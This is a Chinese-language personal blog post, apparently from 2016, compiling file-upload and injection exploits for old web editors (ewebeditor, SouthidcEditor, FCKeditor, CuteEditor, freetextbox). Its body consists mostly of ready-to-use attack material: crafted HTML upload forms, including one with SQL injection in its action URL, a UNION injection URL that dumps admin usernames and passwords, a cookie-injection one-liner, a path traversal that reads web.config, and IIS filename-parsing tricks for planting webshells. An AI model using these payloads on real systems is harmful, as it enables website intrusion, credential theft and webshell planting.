<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="php," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。编辑器漏洞总结
常见编辑器：

ewebeditorSouthidcEditorfckeditorCuteEditorfreetextbox
0x01 ewebeditor编辑器：默认后台:
http://127.0.0.1/ewebeditor/admin_login.asp
http://127.0.0.1/ew">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传总结【一】">
<meta property="og:url" content="http://lovexiaofeng.cn/2016/07/27/19/index.html">
<meta property="og:site_name" content="小峰's Blog">
<meta property="og:description" content="对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。编辑器漏洞总结
常见编辑器：

ewebeditorSouthidcEditorfckeditorCuteEditorfreetextbox
0x01 ewebeditor编辑器：默认后台:
http://127.0.0.1/ewebeditor/admin_login.asp
http://127.0.0.1/ew">
<meta property="og:updated_time" content="2016-07-27T03:11:59.056Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="文件上传总结【一】">
<meta name="twitter:description" content="对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。编辑器漏洞总结
常见编辑器：

ewebeditorSouthidcEditorfckeditorCuteEditorfreetextbox
0x01 ewebeditor编辑器：默认后台:
http://127.0.0.1/ewebeditor/admin_login.asp
http://127.0.0.1/ew">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"always"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://lovexiaofeng.cn/2016/07/27/19/"/>

  <title> 文件上传总结【一】 | 小峰's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">小峰's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">一个不抽烟 不喝酒的少年</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                文件上传总结【一】
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-07-27T08:35:38+08:00" content="2016-07-27">
              2016-07-27
            </time>
          </span>

          

          
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。"><a href="#对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。" class="headerlink" title="对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。"></a>对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。</h3><h2 id="编辑器漏洞总结"><a href="#编辑器漏洞总结" class="headerlink" title="编辑器漏洞总结"></a>编辑器漏洞总结</h2><ul>
<li>常见编辑器：</li>
</ul>
<p>ewebeditor<br>SouthidcEditor<br>fckeditor<br>CuteEditor<br>freetextbox</p>
<h2 id="0x01-ewebeditor编辑器："><a href="#0x01-ewebeditor编辑器：" class="headerlink" title="0x01 ewebeditor编辑器："></a>0x01 ewebeditor编辑器：</h2><p>默认后台:</p>
<pre><code>http://127.0.0.1/ewebeditor/admin_login.asp
http://127.0.0.1/ewebeditor/admin/login.asp
</code></pre><p>默认数据库：</p>
<pre><code>http://127.0.0.1/ewebeditor/db/ewebeditor.mdb
http://127.0.0.1/ewebeditor/db/%23ewebeditor.mdb
</code></pre><p>有一个版本的密码是在配置文件中</p>
<pre><code>http://127.0.0.1/ewebeditor/admin/config.asp
</code></pre><p>进入编辑器，上传asa或者asp，得到webshell，也可以本地构造一个html进行上传</p>
<pre><code>&lt;form action=”http://127.0.0.1/ewebditor/upload.asp?action=save&amp;type=&amp;style=样式名” method=post name=myform enctype=”multipart/form-data”&gt;
&lt;input type=file name=uploadfile size=1 style=”width:100%”&gt;
&lt;input type=submit value=”上传了”&gt;&lt;/input&gt;
&lt;/form&gt;
</code></pre><p>利用： </p>
<ul>
<li>后台如果能进入</li>
<li>可点击样式管理</li>
</ul>
<p>standard 拷贝一份(直接修改改不了名字可以随便)<br>在拷贝的一份里加入图片类型( asa cer aaspsp )，然后点预览，在编辑器里点设计，然后直接上传asa大马，上传后，右键查看源代码就可以看到OO的位置!<br>(原理:因为在iis里 网站的属性里 应用程序配置一项   asa扩展名还是用asp.dll来解析的,asp也是,还有cer/cdx)</p>
<a id="more"></a> 
<h4 id="net-ewebeditor-漏洞利用"><a href="#net-ewebeditor-漏洞利用" class="headerlink" title=".net ewebeditor 漏洞利用"></a>.net ewebeditor 漏洞利用</h4><p>默认上传地址:</p>
<pre><code>http://127.0.0.1/ewebeditor/upload.aspx
</code></pre><p>直接上传一个cer的木马，在无法上传的情况下，可以地址栏构造以下代码:   </p>
<pre><code>javascript:lbtnUpload.click();
</code></pre><p>然后查看源代码，找到uploadsave，找到OO地址，默认传到uploadfile这个文件夹里<br>(漏洞修补: 可以在iis里直接把upload文件夹的执行权限设置为无. )</p>
<h4 id="jsp版-ewebeditor-漏洞利用"><a href="#jsp版-ewebeditor-漏洞利用" class="headerlink" title="jsp版 ewebeditor 漏洞利用"></a>jsp版 ewebeditor 漏洞利用</h4><pre><code>http://127.0.0.1/ewebeditor/upload.jsp
</code></pre><p>说明：jsp版的没做文件过滤，直接选择个jsp马 然后回车 右键查看源代码即可</p>
<p>在给几个 个别版本的 利用程序 </p>
<h4 id="ewebeditor-asp版-2-1-6-上传漏洞利用程序"><a href="#ewebeditor-asp版-2-1-6-上传漏洞利用程序" class="headerlink" title="ewebeditor asp版 2.1.6 上传漏洞利用程序"></a>ewebeditor asp版 2.1.6 上传漏洞利用程序</h4><pre><code>&lt;form action=&quot;http://127.0.0.1/ewebeditor/upload.asp?action=save&amp;type=IMAGE&amp;style=standard&apos; &lt;SPAN style=&quot;COLOR: #ff0000&quot;&gt;and 1=2&lt;/SPAN&gt; union select S_ID,S_Name,S_Dir,S_CSS,&apos;&lt;SPAN style=&quot;COLOR: #ff0000&quot;&gt;UploadFile&apos;&lt;/SPAN&gt;,S_Width,S_Height,S_Memo,S_IsSys,[S_FileExt]%2b&apos;|cer&apos; ,S_FlashExt,[&lt;SPAN style=&quot;COLOR: #ff0000&quot;&gt;S_ImageExt]%2b&apos;|asa&apos;,&lt;/SPAN&gt;S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=&apos;standard&apos;and&apos;a&apos;=&apos;a&quot; method=post name=myform enctype=&quot;multipart/form-data&quot;&gt; 
&lt;input type=file name=uploadfile size=100&gt;&lt;br&gt;&lt;br&gt; 
&lt;input type=submit value=Fuck&gt; 
&lt;/form&gt;
</code></pre><h2 id="0x02-ewebeditor-PHP3-8-0day漏洞"><a href="#0x02-ewebeditor-PHP3-8-0day漏洞" class="headerlink" title="0x02 ewebeditor PHP3.8 0day漏洞"></a>0x02 ewebeditor PHP3.8 0day漏洞</h2><pre><code>&lt;form action=&quot;http://127.0.0.1/ewebeditor/asp/upload.asp?action=savetype=image&amp;style=popup&amp;cusdir=a.asp&quot; method=post name=myform enctype=&quot;multipart/form-data&quot;&gt;
&lt;input type=file name=uploadfile size=100&gt;&lt;br&gt;&lt;br&gt;
&lt;input type=submit value=upload&gt;
&lt;/form&gt;
</code></pre><h2 id="0x03-SouthidcEditor编辑器："><a href="#0x03-SouthidcEditor编辑器：" class="headerlink" title="0x03 SouthidcEditor编辑器："></a>0x03 SouthidcEditor编辑器：</h2><p>这个和ewebeditor一样 南方数据、良精系统、网软天下等程序后台都是这个编辑器</p>
<pre><code>http://127.0.0.1/NewsType.asp?SmallClass=&apos;%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20&apos;&apos;=&apos;
</code></pre><p>直接爆管理帐号密码</p>
<h4 id="cookie注入"><a href="#cookie注入" class="headerlink" title="cookie注入"></a>cookie注入</h4><pre><code>http://127.0.0.1/NewsType.asp?id=XX
</code></pre><h4 id="清空地址栏，利用union语句来注入"><a href="#清空地址栏，利用union语句来注入" class="headerlink" title="清空地址栏，利用union语句来注入"></a>清空地址栏，利用union语句来注入</h4><pre><code>javascript:alert(document.cookie=&quot;id=&quot;+escape(&quot;1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin&quot;))
</code></pre><p>然后在访问：/NewsType.asp 就爆出来了。 </p>
<h4 id="SouthidcEditor默认数据库"><a href="#SouthidcEditor默认数据库" class="headerlink" title="SouthidcEditor默认数据库:"></a>SouthidcEditor默认数据库:</h4><pre><code>http://127.0.0.1/southidceditor/datas/southidceditor.mdb 
</code></pre><h4 id="默认登录地址："><a href="#默认登录地址：" class="headerlink" title="默认登录地址："></a>默认登录地址：</h4><pre><code>http://127.0.0.1/southidceditor/admin/admin_login.asp 
http://127.0.0.1/southidceditor/login.asp 
</code></pre><p>如果没有默认登陆页面 只要你登录进后台直接打开 </p>
<pre><code>http://127.0.0.1/admin/Southidceditor/admin_style.asp 
</code></pre><h2 id="0x04"><a href="#0x04" class="headerlink" title="0x04"></a>0x04</h2><h4 id="1-查看编辑器版本-FCKeditor-whatsnew-html"><a href="#1-查看编辑器版本-FCKeditor-whatsnew-html" class="headerlink" title="1.查看编辑器版本 FCKeditor/_whatsnew.html"></a>1.查看编辑器版本 FCKeditor/_whatsnew.html</h4><h4 id="2-Version-2-2-版本"><a href="#2-Version-2-2-版本" class="headerlink" title="2. Version 2.2 版本"></a>2. Version 2.2 版本</h4><p>Apache+linux 环境下在上传文件后面加个.突破！测试通过。</p>
<h4 id="3-Version-lt-2-4-2-For-php-在处理PHP-上传的地方并未对Media-类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。"><a href="#3-Version-lt-2-4-2-For-php-在处理PHP-上传的地方并未对Media-类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。" class="headerlink" title="3.Version &lt;=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。"></a>3.Version &lt;=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。</h4><pre><code>&lt;form id=&quot;frmUpload&quot; enctype=&quot;multipart/form-data&quot;
action=&quot;http://127.0.0.1/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media&quot; method=&quot;post&quot;&gt;Upload a new file:&lt;br&gt;
&lt;input type=&quot;file&quot; name=&quot;NewFile&quot; size=&quot;50&quot;&gt;&lt;br&gt;
&lt;input id=&quot;btnUpload&quot; type=&quot;submit&quot; value=&quot;Upload&quot;&gt;
&lt;/form&gt;
</code></pre><h4 id="4-FCKeditor-文件上传“-”变“-”下划线的绕过方法"><a href="#4-FCKeditor-文件上传“-”变“-”下划线的绕过方法" class="headerlink" title="4.FCKeditor 文件上传“.”变“_”下划线的绕过方法"></a>4.FCKeditor 文件上传“.”变“_”下划线的绕过方法</h4><pre><code>很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。 
</code></pre><ul>
<li>4.1：提交shell.php+空格绕过，不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。 </li>
<li>4.2：继续上传同名文件可变为shell.php;(1).jpg，也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。 </li>
</ul>
<h4 id="5-突破建立文件夹"><a href="#5-突破建立文件夹" class="headerlink" title="5. 突破建立文件夹"></a>5. 突破建立文件夹</h4><pre><code>FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=%2FSilic.asp&amp;NewFolderName=z&amp;uuid=1244789975684 
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&amp;CurrentFolder=/&amp;Type=Image&amp;NewFolderName=Silic.asp 
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;Type=Image&amp;CurrentFolder=/Silic.asp&amp;NewFolderName=k.asp   
</code></pre><h4 id="6-爆路径漏洞"><a href="#6-爆路径漏洞" class="headerlink" title="6.爆路径漏洞"></a>6.爆路径漏洞</h4><pre><code>FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&amp;Type=File&amp;CurrentFolder=/Silic.asp 
</code></pre><h2 id="0x05-CuteEditor编辑器："><a href="#0x05-CuteEditor编辑器：" class="headerlink" title="0x05 CuteEditor编辑器："></a>0x05 CuteEditor编辑器：</h2><h4 id="1-直接下载load-ashx配置文件"><a href="#1-直接下载load-ashx配置文件" class="headerlink" title="1.直接下载load.ashx配置文件"></a>1.直接下载load.ashx配置文件</h4><pre><code>http://127.0.0.1/CuteSoft_Client/CuteEditor/Load.ashx?type=image&amp;file=../../../web.config
</code></pre><p>然后查看一些sql配置信息 从sql数据库连接入手</p>
<h4 id="方法2-2003-iis解析-后台拿webshell"><a href="#方法2-2003-iis解析-后台拿webshell" class="headerlink" title="方法2.2003 iis解析(后台拿webshell)"></a>方法2.2003 iis解析(后台拿webshell)</h4><p>填加新闻–上传音乐、视频等图标—新建目录xx.asp，然后上传小马1.avi，菜刀连接</p>
<h2 id="0x06-freetextbox编辑器："><a href="#0x06-freetextbox编辑器：" class="headerlink" title="0x06 freetextbox编辑器："></a>0x06 freetextbox编辑器：</h2><h4 id="漏洞描述：所有版本，没做登陆验证可以直接访问上传木马，FTBv3-3-1-可以直接上传任意格式的文件"><a href="#漏洞描述：所有版本，没做登陆验证可以直接访问上传木马，FTBv3-3-1-可以直接上传任意格式的文件" class="headerlink" title="漏洞描述：所有版本，没做登陆验证可以直接访问上传木马，FTBv3-3-1 可以直接上传任意格式的文件"></a>漏洞描述：所有版本，没做登陆验证可以直接访问上传木马，FTBv3-3-1 可以直接上传任意格式的文件</h4><h4 id="Freetextbox-1-6-3-及其他版本可以上传格式为：1-asp-jpg-文件-上传后木马地址为-http-127-0-0-1-images-1-asp-jpg"><a href="#Freetextbox-1-6-3-及其他版本可以上传格式为：1-asp-jpg-文件-上传后木马地址为-http-127-0-0-1-images-1-asp-jpg" class="headerlink" title="Freetextbox 1.6.3 及其他版本可以上传格式为：1.asp;.jpg 文件 上传后木马地址为 http://127.0.0.1/images/1.asp;.jpg"></a>Freetextbox 1.6.3 及其他版本可以上传格式为：1.asp;.jpg 文件 上传后木马地址为 <a href="http://127.0.0.1/images/1.asp;.jpg" target="_blank" rel="external">http://127.0.0.1/images/1.asp;.jpg</a></h4><h4 id="漏洞文件：ftb-imagegallery-aspx"><a href="#漏洞文件：ftb-imagegallery-aspx" class="headerlink" title="漏洞文件：ftb.imagegallery.aspx"></a>漏洞文件：ftb.imagegallery.aspx</h4><h4 id="http-127-0-0-1-freetextbox-ftb-imagegallery-aspx-frame-1”在地址后面加上-amp-rif-amp-cif"><a href="#http-127-0-0-1-freetextbox-ftb-imagegallery-aspx-frame-1”在地址后面加上-amp-rif-amp-cif" class="headerlink" title="http://127.0.0.1/freetextbox/ftb.imagegallery.aspx?frame=1”在地址后面加上&amp;rif=..&amp;cif=.."></a><a href="http://127.0.0.1/freetextbox/ftb.imagegallery.aspx?frame=1”在地址后面加上&amp;rif=..&amp;cif=" target="_blank" rel="external">http://127.0.0.1/freetextbox/ftb.imagegallery.aspx?frame=1”在地址后面加上&amp;rif=..&amp;cif=</a>..</h4><h4 id="再访问-整个网站的目录就呈现在眼前了-下面还有上传删除等按钮"><a href="#再访问-整个网站的目录就呈现在眼前了-下面还有上传删除等按钮" class="headerlink" title="再访问 整个网站的目录就呈现在眼前了,下面还有上传删除等按钮"></a>再访问 整个网站的目录就呈现在眼前了,下面还有上传删除等按钮</h4>
      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/php/" rel="tag">#php</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/07/04/18/" rel="next" title="python多线程爬乌云Drops文章">
                <i class="fa fa-chevron-left"></i> python多线程爬乌云Drops文章
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/07/27/20/" rel="prev" title="文件上传总结【二】">
                文件上传总结【二】 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/img.jpg"
               alt="ih0cker" />
          <p class="site-author-name" itemprop="name">ih0cker</p>
          <p class="site-description motion-element" itemprop="description">沉默，可以让混乱的心，变得清澈。</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">30</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">9</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/xiaofengtongxue" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://twitter.com/your-user-name" target="_blank" title="Twitter">
                  
                    <i class="fa fa-fw fa-twitter"></i>
                  
                  Twitter
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/p/1005053869837461/home?from=page_100505&mod=TAB&is_hot=1#place" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://www.zhihu.com/people/helay" target="_blank" title="知乎">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  知乎
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。"><span class="nav-number">1.</span> <span class="nav-text">对文件上传简直就是疯了，谷歌语法，各种上传漏洞，上传绕过，对这几天的笔记做的总结。</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#编辑器漏洞总结"><span class="nav-number"></span> <span class="nav-text">编辑器漏洞总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-ewebeditor编辑器："><span class="nav-number"></span> <span class="nav-text">0x01 ewebeditor编辑器：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#net-ewebeditor-漏洞利用"><span class="nav-number">0.1.</span> <span class="nav-text">.net ewebeditor 漏洞利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#jsp版-ewebeditor-漏洞利用"><span class="nav-number">0.2.</span> <span class="nav-text">jsp版 ewebeditor 漏洞利用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#ewebeditor-asp版-2-1-6-上传漏洞利用程序"><span class="nav-number">0.3.</span> <span class="nav-text">ewebeditor asp版 2.1.6 上传漏洞利用程序</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-ewebeditor-PHP3-8-0day漏洞"><span class="nav-number"></span> <span class="nav-text">0x02 ewebeditor PHP3.8 0day漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-SouthidcEditor编辑器："><span class="nav-number"></span> <span class="nav-text">0x03 SouthidcEditor编辑器：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#cookie注入"><span class="nav-number">0.1.</span> <span class="nav-text">cookie注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#清空地址栏，利用union语句来注入"><span class="nav-number">0.2.</span> <span class="nav-text">清空地址栏，利用union语句来注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SouthidcEditor默认数据库"><span class="nav-number">0.3.</span> <span class="nav-text">SouthidcEditor默认数据库:</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#默认登录地址："><span class="nav-number">0.4.</span> <span class="nav-text">默认登录地址：</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04"><span class="nav-number"></span> <span class="nav-text">0x04</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-查看编辑器版本-FCKeditor-whatsnew-html"><span class="nav-number">0.1.</span> <span class="nav-text">1.查看编辑器版本 FCKeditor/_whatsnew.html</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-Version-2-2-版本"><span class="nav-number">0.2.</span> <span class="nav-text">2. Version 2.2 版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-Version-lt-2-4-2-For-php-在处理PHP-上传的地方并未对Media-类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。"><span class="nav-number">0.3.</span> <span class="nav-text">3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-FCKeditor-文件上传“-”变“-”下划线的绕过方法"><span class="nav-number">0.4.</span> <span class="nav-text">4.FCKeditor 文件上传“.”变“_”下划线的绕过方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-突破建立文件夹"><span class="nav-number">0.5.</span> <span class="nav-text">5. 突破建立文件夹</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-爆路径漏洞"><span class="nav-number">0.6.</span> <span class="nav-text">6.爆路径漏洞</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-CuteEditor编辑器："><span class="nav-number"></span> <span class="nav-text">0x05 CuteEditor编辑器：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-直接下载load-ashx配置文件"><span class="nav-number">0.1.</span> <span class="nav-text">1.直接下载load.ashx配置文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#方法2-2003-iis解析-后台拿webshell"><span class="nav-number">0.2.</span> <span class="nav-text">方法2.2003 iis解析(后台拿webshell)</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x06-freetextbox编辑器："><span class="nav-number"></span> <span class="nav-text">0x06 freetextbox编辑器：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞描述：所有版本，没做登陆验证可以直接访问上传木马，FTBv3-3-1-可以直接上传任意格式的文件"><span class="nav-number">0.1.</span> <span class="nav-text">漏洞描述：所有版本，没做登陆验证可以直接访问上传木马，FTBv3-3-1 可以直接上传任意格式的文件</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Freetextbox-1-6-3-及其他版本可以上传格式为：1-asp-jpg-文件-上传后木马地址为-http-127-0-0-1-images-1-asp-jpg"><span class="nav-number">0.2.</span> <span class="nav-text">Freetextbox 1.6.3 及其他版本可以上传格式为：1.asp;.jpg 文件 上传后木马地址为 http://127.0.0.1/images/1.asp;.jpg</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞文件：ftb-imagegallery-aspx"><span class="nav-number">0.3.</span> <span class="nav-text">漏洞文件：ftb.imagegallery.aspx</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#http-127-0-0-1-freetextbox-ftb-imagegallery-aspx-frame-1”在地址后面加上-amp-rif-amp-cif"><span class="nav-number">0.4.</span> <span class="nav-text">http://127.0.0.1/freetextbox/ftb.imagegallery.aspx?frame=1”在地址后面加上&rif=..&cif=..</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#再访问-整个网站的目录就呈现在眼前了-下面还有上传删除等按钮"><span class="nav-number">0.5.</span> <span class="nav-text">再访问 整个网站的目录就呈现在眼前了,下面还有上传删除等按钮</span></a></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ih0cker</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  




  
  

  

  

  

